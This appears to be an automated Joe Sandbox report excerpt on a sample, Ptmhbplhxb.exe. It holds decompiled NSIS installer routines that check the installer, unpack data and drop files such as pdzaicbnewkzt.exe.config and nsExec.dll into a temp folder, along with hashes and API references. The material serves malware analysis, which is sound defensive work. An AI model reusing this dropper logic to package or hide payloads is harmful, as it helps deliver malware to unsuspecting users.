                • Opcode ID: 7c46e95d15e6a007461aada79675e14bbdf31a6050e9bfd56e3caf825b44128a
                • Instruction ID: cf57693f3f88dc886a5042f17341946b18930627488d4c28d640959b633c26bb
                • Opcode Fuzzy Hash: 7c46e95d15e6a007461aada79675e14bbdf31a6050e9bfd56e3caf825b44128a
                • Instruction Fuzzy Hash: 3E61D770240600AED620BB669D45F373EACEB44749F40447EF985B22E2DB7C9D029A2D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402D48 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 182COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 205 402d48-402d96 GetTickCount GetModuleFileNameA call 405afe 208 402da2-402dd0 call 405f65 call 405944 call 405f65 GetFileSize 205->208 209 402d98-402d9d 205->209 217 402dd6 208->217 218 402ebd-402ecb call 402ce4 208->218 210 402f7a-402f7e 209->210 219 402ddb-402df2 217->219 224 402f20-402f25 218->224 225 402ecd-402ed0 218->225 221 402df4 219->221 222 402df6-402dff call 403193 219->222 221->222 231 402e05-402e0c 222->231 232 402f27-402f2f call 402ce4 222->232 224->210 227 402ed2-402eea call 4031a9 call 403193 225->227 228 402ef4-402f1e GlobalAlloc call 4031a9 call 402f81 225->228 227->224 251 402eec-402ef2 227->251 228->224 256 402f31-402f42 228->256 235 402e88-402e8c 231->235 236 402e0e-402e22 call 405ab9 231->236 232->224 240 402e96-402e9c 235->240 241 402e8e-402e95 call 402ce4 235->241 236->240 254 402e24-402e2b 236->254 247 402eab-402eb5 240->247 248 402e9e-402ea8 call 4063b4 240->248 241->240 247->219 255 402ebb 247->255 248->247 251->224 251->228 254->240 260 402e2d-402e34 254->260 255->218 257 402f44 256->257 258 402f4a-402f4f 256->258 257->258 261 402f50-402f56 258->261 260->240 262 402e36-402e3d 260->262 261->261 263 402f58-402f73 SetFilePointer call 405ab9 261->263 262->240 264 402e3f-402e46 262->264 267 402f78 263->267 264->240 266 402e48-402e68 264->266 266->224 268 402e6e-402e72 266->268 267->210 269 402e74-402e78 268->269 270 402e7a-402e82 268->270 269->255 269->270 270->240 271 402e84-402e86 270->271 271->240
                C-Code - Quality: 80%
                			E00402D48(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\frontdesk\\Desktop\\Ptmhbplhxb.exe";
				 *0x42f410 = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\frontdesk\\Desktop\\Ptmhbplhxb.exe", 0x400);
				_t89 = E00405AFE(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\frontdesk\\Desktop";
				E00405F65("C:\\Users\\frontdesk\\Desktop", _t91);
				E00405F65(0x437000, E00405944(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x42142c = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402CE4(1);
					__eflags =  *0x42f418 - _t82;
					if( *0x42f418 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E004031A9( *0x42f418 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402F81(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42f414 = _t94;
							 *0x42f41c =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42f420 =  *0x42f420 + 1;
								__eflags =  *0x42f420;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405AB9(0x42f440, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004031A9( *0x415420);
					_t65 = E00403193( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x42f418) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403193(0x421430, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402CE4(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42f418;
						if( *0x42f418 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402CE4(0);
							}
							goto L20;
						}
						E00405AB9( &_v44, 0x421430, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x415420; // 0x36e154
						 *0x42f4c0 =  *0x42f4c0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42f418 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x40a194
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x42142c; // 0x36e158
						if(__eflags < 0) {
							_v12 = E004063B4(_v12, 0x421430, _t90);
						}
						 *0x415420 =  *0x415420 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}































                0x00402d50
                0x00402d53
                0x00402d56
                0x00402d59
                0x00402d5f
                0x00402d70
                0x00402d75
                0x00402d88
                0x00402d8d
                0x00402d90
                0x00402d96
                0x00000000
                0x00402d98
                0x00402da3
                0x00402da9
                0x00402dba
                0x00402dc1
                0x00402dc7
                0x00402dc9
                0x00402dce
                0x00402dd0
                0x00402ebd
                0x00402ebf
                0x00402ec4
                0x00402ecb
                0x00000000
                0x00000000
                0x00402ecd
                0x00402ed0
                0x00402ef4
                0x00402ef9
                0x00402eff
                0x00402f0a
                0x00402f0f
                0x00402f12
                0x00402f13
                0x00402f14
                0x00402f16
                0x00402f1b
                0x00402f1e
                0x00402f31
                0x00402f35
                0x00402f3d
                0x00402f42
                0x00402f44
                0x00402f44
                0x00402f44
                0x00402f4c
                0x00402f4c
                0x00402f4f
                0x00402f50
                0x00402f50
                0x00402f53
                0x00402f55
                0x00402f55
                0x00402f55
                0x00402f5f
                0x00402f65
                0x00402f73
                0x00402f78
                0x00000000
                0x00402f78
                0x00000000
                0x00402f1e
                0x00402ed8
                0x00402ee3
                0x00402ee8
                0x00402eea
                0x00000000
                0x00000000
                0x00402eef
                0x00402ef2
                0x00000000
                0x00000000
                0x00000000
                0x00402dd6
                0x00402ddb
                0x00402de0
                0x00402de4
                0x00402deb
                0x00402df0
                0x00402df2
                0x00402df4
                0x00402df4
                0x00402df8
                0x00402dfd
                0x00402dff
                0x00402f29
                0x00402f20
                0x00000000
                0x00402f20
                0x00402e05
                0x00402e0c
                0x00402e88
                0x00402e8c
                0x00402e90
                0x00402e95
                0x00000000
                0x00402e8c
                0x00402e15
                0x00402e1a
                0x00402e1d
                0x00402e22
                0x00000000
                0x00000000
                0x00402e24
                0x00402e2b
                0x00000000
                0x00000000
                0x00402e2d
                0x00402e34
                0x00000000
                0x00000000
                0x00402e36
                0x00402e3d
                0x00000000
                0x00000000
                0x00402e3f
                0x00402e46
                0x00000000
                0x00000000
                0x00402e48
                0x00402e4e
                0x00402e57
                0x00402e5d
                0x00402e60
                0x00402e62
                0x00402e68
                0x00000000
                0x00000000
                0x00402e6e
                0x00402e72
                0x00402e7a
                0x00402e7a
                0x00402e7d
                0x00402e7d
                0x00402e80
                0x00402e82
                0x00402e84
                0x00402e84
                0x00000000
                0x00402e82
                0x00402e74
                0x00402e78
                0x00000000
                0x00000000
                0x00000000
                0x00402e96
                0x00402e96
                0x00402e9c
                0x00402ea8
                0x00402ea8
                0x00402eab
                0x00402eb1
                0x00402eb3
                0x00402eb3
                0x00402ebb
                0x00402ebb
                0x00000000
                0x00402ebb

                APIs
                • GetTickCount.KERNEL32 ref: 00402D59
                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Ptmhbplhxb.exe,00000400), ref: 00402D75
                  • Part of subcall function 00405AFE: GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\Ptmhbplhxb.exe,80000000,00000003), ref: 00405B02
                  • Part of subcall function 00405AFE: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B24
                • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ptmhbplhxb.exe,C:\Users\user\Desktop\Ptmhbplhxb.exe,80000000,00000003), ref: 00402DC1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: File$AttributesCountCreateModuleNameSizeTick
                • String ID: "C:\Users\user\Desktop\Ptmhbplhxb.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Ptmhbplhxb.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$T6$X6$soft
                • API String ID: 4283519449-3397626543
                • Opcode ID: 7ea76b1eabee36cc462c4becf9ee5f087804ecb308710c36f18c8c35563ccf84
                • Instruction ID: b7ea9236aecaa86e611592eb70b2ed5589fa10121b1bd9207fea2451aa196312
                • Opcode Fuzzy Hash: 7ea76b1eabee36cc462c4becf9ee5f087804ecb308710c36f18c8c35563ccf84
                • Instruction Fuzzy Hash: 9D51F431A00215ABDB20AF64DE89B9F7BB8FB14358F50413BE504B72D1C7B88D858B9C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402F81 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 341 402f81-402f95 342 402f97 341->342 343 402f9e-402fa7 341->343 342->343 344 402fb0-402fb5 343->344 345 402fa9 343->345 346 402fc5-402fd2 call 403193 344->346 347 402fb7-402fc0 call 4031a9 344->347 345->344 351 403181 346->351 352 402fd8-402fdc 346->352 347->346 353 403183-403184 351->353 354 402fe2-40302b GetTickCount 352->354 355 40312c-40312e 352->355 358 40318c-403190 353->358 359 403031-403039 354->359 360 403189 354->360 356 403130-403133 355->356 357 40316e-403171 355->357 356->360 363 403135 356->363 361 403173 357->361 362 403176-40317f call 403193 357->362 364 40303b 359->364 365 40303e-40304c call 403193 359->365 360->358 361->362 362->351 374 403186 362->374 368 403138-40313e 363->368 364->365 365->351 373 403052-40305b 365->373 371 403140 368->371 372 403142-403150 call 403193 368->372 371->372 372->351 378 403152-403157 call 405ba5 372->378 377 403061-403081 call 406422 373->377 374->360 383 403124-403126 377->383 384 403087-40309a GetTickCount 377->384 382 40315c-40315e 378->382 385 403160-40316a 382->385 386 403128-40312a 382->386 383->353 387 40309c-4030a4 384->387 388 4030df-4030e1 384->388 385->368 389 40316c 385->389 386->353 390 4030a6-4030aa 387->390 391 4030ac-4030dc MulDiv wsprintfA call 40508c 387->391 392 4030e3-4030e7 388->392 393 403118-40311c 388->393 389->360 390->388 390->391 391->388 396 4030e9-4030f0 call 405ba5 392->396 397 4030fe-403109 392->397 393->359 394 403122 393->394 394->360 401 4030f5-4030f7 396->401 398 40310c-403110 397->398 398->377 402 403116 398->402 401->386 403 4030f9-4030fc 401->403 402->360 403->398
                C-Code - Quality: 95%
                			E00402F81(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t65;
				void* _t69;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x419428;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E004031A9( *0x42f478 + _t62);
				}
				if(E00403193( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E00403193(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E00403193(0x415428, _t98) == 0) {
								goto L41;
							}
							_t69 = E00405BA5(_a8, 0x415428, _t98); // executed
							if(_t69 == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40bd8c =  *0x40bd8c & 0x00000000;
					 *0x40bd88 =  *0x40bd88 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40b870 = 8;
					 *0x415418 = 0x40d410;
					 *0x415414 = 0x40d410;
					 *0x415410 = 0x415410;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E00403193(0x415428, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40b860 = 0x415428;
						 *0x40b864 = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40b868 = _t95;
							 *0x40b86c = _v12;
							_t75 = E00406422(0x40b860);
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40b868; // 0x419517
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x42f4d4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E0040508C(0,  &_v88);
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40b868; // 0x419517
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E00405BA5(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}


























                0x00402f89
                0x00402f8d
                0x00402f90
                0x00402f95
                0x00402f97
                0x00402f97
                0x00402f9e
                0x00402fa2
                0x00402fa7
                0x00402fa9
                0x00402fa9
                0x00402fb0
                0x00402fb5
                0x00402fc0
                0x00402fc0
                0x00402fd2
                0x00403181
                0x00403181
                0x00000000
                0x00402fd8
                0x00402fdc
                0x0040312e
                0x00403171
                0x00403173
                0x00403173
                0x0040317f
                0x00403186
                0x00403189
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040317f
                0x00403133
                0x00000000
                0x00000000
                0x00403135
                0x00403138
                0x0040313b
                0x0040313e
                0x00403140
                0x00403140
                0x00403150
                0x00000000
                0x00000000
                0x00403157
                0x0040315e
                0x00403128
                0x00403128
                0x00403183
                0x00403183
                0x00000000
                0x00403183
                0x00403160
                0x00403163
                0x0040316a
                0x00000000
                0x00000000
                0x00000000
                0x0040316c
                0x00000000
                0x00403138
                0x00402fe8
                0x00402fea
                0x00402ff1
                0x00402ff8
                0x00402ff8
                0x00402fff
                0x00403007
                0x00403011
                0x00403016
                0x0040301e
                0x00403028
                0x0040302b
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00403031
                0x00403031
                0x00403031
                0x00403039
                0x0040303b
                0x0040303b
                0x0040304c
                0x00000000
                0x00000000
                0x00403052
                0x00403055
                0x0040305b
                0x00403061
                0x00403061
                0x0040306c
                0x00403072
                0x00403077
                0x0040307e
                0x00403081
                0x00000000
                0x00000000
                0x00403087
                0x0040308d
                0x0040308f
                0x00403098
                0x0040309a
                0x004030c8
                0x004030ce
                0x004030d7
                0x004030dc
                0x004030dc
                0x004030e1
                0x0040311c
                0x00000000
                0x00000000
                0x00000000
                0x004030e3
                0x004030e7
                0x004030fe
                0x00403103
                0x00403106
                0x00403109
                0x0040310c
                0x00403110
                0x00000000
                0x00000000
                0x00000000
                0x00403116
                0x004030f0
                0x004030f7
                0x00000000
                0x00000000
                0x004030f9
                0x00000000
                0x004030f9
                0x004030e1
                0x00403124
                0x00000000
                0x00403124
                0x00000000
                0x00403031

                APIs
                Strings
                • (TA, xrefs: 0040303E
                • (TA, xrefs: 00403142
                • <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v2.0.50727"/><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0,Profile=Client"/></startup></configuration>, xrefs: 00403002
                • ... %d%%, xrefs: 004030C2
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: CountTick$wsprintf
                • String ID: (TA$(TA$... %d%%$<?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v2.0.50727"/><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0,Profile=Client"/></startup></configuration>
                • API String ID: 551687249-1307617928
                • Opcode ID: 219cae2b91f3bf38bad7132d0a8990421fc9c3883ef73589e1e6bd7f052db87f
                • Instruction ID: f4b3021151c61e236b0315b1fcc5adb3b60be84788d5942dbd3e7f3cce39453d
                • Opcode Fuzzy Hash: 219cae2b91f3bf38bad7132d0a8990421fc9c3883ef73589e1e6bd7f052db87f
                • Instruction Fuzzy Hash: 86517D71900219EBDB10DF65DA4469E7BB8EF48356F14853BE800BB2D0C7789E41CBAD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401759 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 404 401759-40177c call 402ac1 call 40596a 409 401786-401798 call 405f65 call 4058fd lstrcatA 404->409 410 40177e-401784 call 405f65 404->410 415 40179d-4017a3 call 4061cf 409->415 410->415 420 4017a8-4017ac 415->420 421 4017ae-4017b8 call 406268 420->421 422 4017df-4017e2 420->422 430 4017ca-4017dc 421->430 431 4017ba-4017c8 CompareFileTime 421->431 423 4017e4-4017e5 call 405ad9 422->423 424 4017ea-401806 call 405afe 422->424 423->424 432 401808-40180b 424->432 433 40187e-4018a7 call 40508c call 402f81 424->433 430->422 431->430 434 401860-40186a call 40508c 432->434 435 40180d-40184f call 405f65 * 2 call 405f87 call 405f65 call 405681 432->435 447 4018a9-4018ad 433->447 448 4018af-4018bb SetFileTime 433->448 445 401873-401879 434->445 435->420 467 401855-401856 435->467 450 40295a 445->450 447->448 449 4018c1-4018cc FindCloseChangeNotification 447->449 448->449 452 402951-402954 449->452 453 4018d2-4018d5 449->453 454 40295c-402960 450->454 452->450 456 4018d7-4018e8 call 405f87 lstrcatA 453->456 457 4018ea-4018ed call 405f87 453->457 463 4018f2-4022e6 call 405681 456->463 457->463 463->452 463->454 467->445 469 401858-401859 467->469 469->434
                C-Code - Quality: 75%
                			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				CHAR* _t83;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402AC1(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E0040596A(_t82);
				_push(_t82);
				_t83 = "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\nsq9535.tmp\\pdzaicbnewkzt.exe.config";
				if(_t33 == 0) {
					lstrcatA(E004058FD(E00405F65(_t83, "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\nsq9535.tmp")), ??);
				} else {
					E00405F65();
				}
				E004061CF(_t83);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00406268(_t83);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405AD9(_t83);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405AFE(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E0040508C(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42f4a8;
						goto L32;
					} else {
						E00405F65(0x40ac18, 0x430000);
						E00405F65(0x430000, _t83);
						E00405F87(_t75, 0x40ac18, _t83, "C:\Users\FRONTD~1\AppData\Local\Temp\nsq9535.tmp\nsExec.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00405F65(0x430000, 0x40ac18);
						_t62 = E00405681("C:\Users\FRONTD~1\AppData\Local\Temp\nsq9535.tmp\nsExec.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42f4a8 =  &( *0x42f4a8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(_t83);
								_push(0xfffffffa);
								E0040508C();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E0040508C(0xffffffea,  *(_t85 - 8));
				 *0x42f4d4 =  *0x42f4d4 + 1;
				_t43 = E00402F81( *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
				 *0x42f4d4 =  *0x42f4d4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405F87(_t75, _t80, _t83, _t83, 0xffffffee);
					} else {
						E00405F87(_t75, _t80, _t83, _t83, 0xffffffe9);
						lstrcatA(_t83,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(_t83);
					E00405681();
					goto L29;
				}
				goto L33;
			}

















                0x00401759
                0x00401760
                0x00401769
                0x0040176c
                0x0040176f
                0x00401774
                0x00401775
                0x0040177c
                0x00401798
                0x0040177e
                0x0040177f
                0x0040177f
                0x0040179e
                0x004017a8
                0x004017a8
                0x004017ac
                0x004017af
                0x004017b4
                0x004017b6
                0x004017b8
                0x004017bd
                0x004017bd
                0x004017c8
                0x004017c8
                0x004017d9
                0x004017db
                0x004017db
                0x004017dc
                0x004017dc
                0x004017df
                0x004017e2
                0x004017e5
                0x004017e5
                0x004017ec
                0x004017fb
                0x00401800
                0x00401803
                0x00401806
                0x00000000
                0x00000000
                0x00401808
                0x0040180b
                0x00401865
                0x0040186a
                0x004015b0
                0x00402716
                0x00402716
                0x00402951
                0x00402954
                0x00402954
                0x00000000
                0x0040180d
                0x00401813
                0x0040181e
                0x0040182b
                0x00401836
                0x0040184c
                0x0040184c
                0x0040184f
                0x00000000
                0x00401855
                0x00401855
                0x00401856
                0x00401873
                0x0040295a
                0x0040295a
                0x0040295a
                0x00401858
                0x00401858
                0x00401859
                0x00401492
                0x004022e1
                0x004022e1
                0x004022e1
                0x00401856
                0x0040184f
                0x0040295c
                0x00402960
                0x00402960
                0x00401883
                0x00401888
                0x00401896
                0x0040189b
                0x004018a1
                0x004018a5
                0x004018a7
                0x004018af
                0x004018bb
                0x004018a9
                0x004018a9
                0x004018ad
                0x00000000
                0x00000000
                0x004018ad
                0x004018c4
                0x004018ca
                0x004018cc
                0x00000000
                0x004018d2
                0x004018d2
                0x004018d5
                0x004018ed
                0x004018d7
                0x004018da
                0x004018e3
                0x004018e3
                0x004018f2
                0x004018f7
                0x004022dc
                0x00000000
                0x004022dc
                0x00000000

                APIs
